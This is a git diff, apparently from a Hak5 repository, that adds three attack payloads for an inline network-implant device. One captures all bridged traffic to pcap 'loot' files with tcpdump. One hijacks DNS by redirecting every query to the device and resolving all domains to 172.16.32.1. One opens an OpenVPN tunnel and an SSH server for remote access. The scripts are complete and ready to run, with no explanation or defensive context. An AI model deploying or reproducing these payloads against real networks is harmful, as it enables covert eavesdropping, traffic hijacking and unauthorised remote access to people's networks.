hak5 · cyrus104 · Jul 9, 2020 · Jul 9, 2020 · Jul 9, 2020 · Jul 10, 2020
diff --git a/payloads/switch1/payload.sh b/payloads/switch1/payload.sh
@@ -1,12 +1,58 @@
 #!/bin/bash
-# 
-# Title:	    Default Payload
-# Description:  Sets the NETMODE to NAT, then sets the LED to ATTACK
-# Author: 	    Hak5
-# Version:	    1.0
-# Category:     default
-# Target: 	    Any
-# Net Mode:	    NAT
-
-NETMODE NAT
-LED ATTACK
+# TCPDump payload v1.0
+
+function monitor_space() {
+	while true
+	do
+		[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+			kill $1
+			LED G SUCCESS
+			sync
+			break
+		}
+		sleep 5
+	done
+}
+
+function finish() {
+	# Kill TCPDump and sync filesystem
+	kill $1
+	wait $1
+	sync
+
+	# Indicate successful shutdown
+	LED R SUCCESS
+	sleep 1
+
+	# Halt the system
+	LED OFF
+	halt
+}
+
+function run() {
+	# Create loot directory
+	mkdir -p /mnt/loot/tcpdump &> /dev/null
+
+	# Set networking to TRANSPARENT mode and wait five seconds
+	NETMODE TRANSPARENT
+	sleep 5
+
+	# Start tcpdump on the bridge interface
+	tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
+	tpid=$!
+
+	# Wait for button to be pressed (disable button LED)
+	NO_LED=true BUTTON
+	finish $tpid
+}
+
+
+# This payload will only run if we have USB storage
+[[ ! -f /mnt/NO_MOUNT ]] && {
+	LED ATTACK
+	run &
+	monitor_space $! &
+} || {
+	LED FAIL
+	NETMODE TRANSPARENT
+}
diff --git a/payloads/switch2/payload.sh b/payloads/switch2/payload.sh
@@ -1,12 +1,29 @@
 #!/bin/bash
-# 
-# Title:	    Default Payload
-# Description:  Sets the NETMODE to NAT, then sets the LED to ATTACK
-# Author: 	    Hak5
-# Version:	    1.0
-# Category:     default
-# Target: 	    Any
-# Net Mode:	    NAT
-
-NETMODE NAT
-LED ATTACK
+# DNSSpoof payload
+
+
+function setup() {
+	# Show SETUP LED
+	LED SETUP
+
+	# Set the network mode to NAT
+	NETMODE NAT
+	sleep 5
+
+	# Copy the spoofhost file to /tmp/dnsmasq.address
+	cp $(dirname ${BASH_SOURCE[0]})/spoofhost /tmp/dnsmasq.address &> /dev/null
+
+	# Restart dnsmasq with the new configuration
+	/etc/init.d/dnsmasq restart	
+}
+
+function run() {
+	# Show  ATTACK LED
+	LED ATTACK
+
+	# Redirect all DNS traffic to ourselves
+	iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53	
+}
+
+setup
+run
diff --git a/payloads/switch2/spoofhost b/payloads/switch2/spoofhost
@@ -0,0 +1 @@
+address=/#/172.16.32.1
diff --git a/payloads/switch3/config.ovpn b/payloads/switch3/config.ovpn
@@ -0,0 +1 @@
+Replace with valid .ovpn config.
diff --git a/payloads/switch3/payload.sh b/payloads/switch3/payload.sh
@@ -1,12 +1,52 @@
 #!/bin/bash
-# 
-# Title:	    Default Payload
-# Description:  Sets the NETMODE to NAT, then sets the LED to ATTACK
-# Author: 	    Hak5
-# Version:	    1.0
-# Category:     default
-# Target: 	    Any
-# Net Mode:	    NAT
-
-NETMODE NAT
-LED ATTACK
+# OpenVPN payload
+
+# Set to 1 to allow clients to use the VPN
+FOR_CLIENTS=0
+
+DNS_SERVER="8.8.8.8"
+
+# Cheap hack to set the DNS server
+function setdns() {
+	while true
+	do
+		[[ ! $(grep -q "$DNS_SERVER" /tmp/resolv.conf) ]] && {
+			echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
+		}
+		sleep 5
+	done
+}
+
+function start() {
+	LED SETUP
+
+	DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
+
+	# Set NETMODE to BRIDGE and wait 3 seconds
+	# to ensure that things can settle
+
+	[[ "$FOR_CLIENTS" == "1" ]] && {
+		/usr/bin/NETMODE VPN
+	} || {
+		/usr/bin/NETMODE BRIDGE
+	}
+	sleep 3
+
+	# Make OpenVPN use the local configuration
+	uci set openvpn.vpn.config="${DIR}/config.ovpn"
+	uci commit
+
+	# Start the OpenVPN server in the background
+	/etc/init.d/openvpn start
+
+	# Start SSH Server
+	/etc/init.d/sshd start &
+
+	# Set DNS server
+	setdns &
+
+	LED ATTACK
+}
+
+# Start the payload
+start &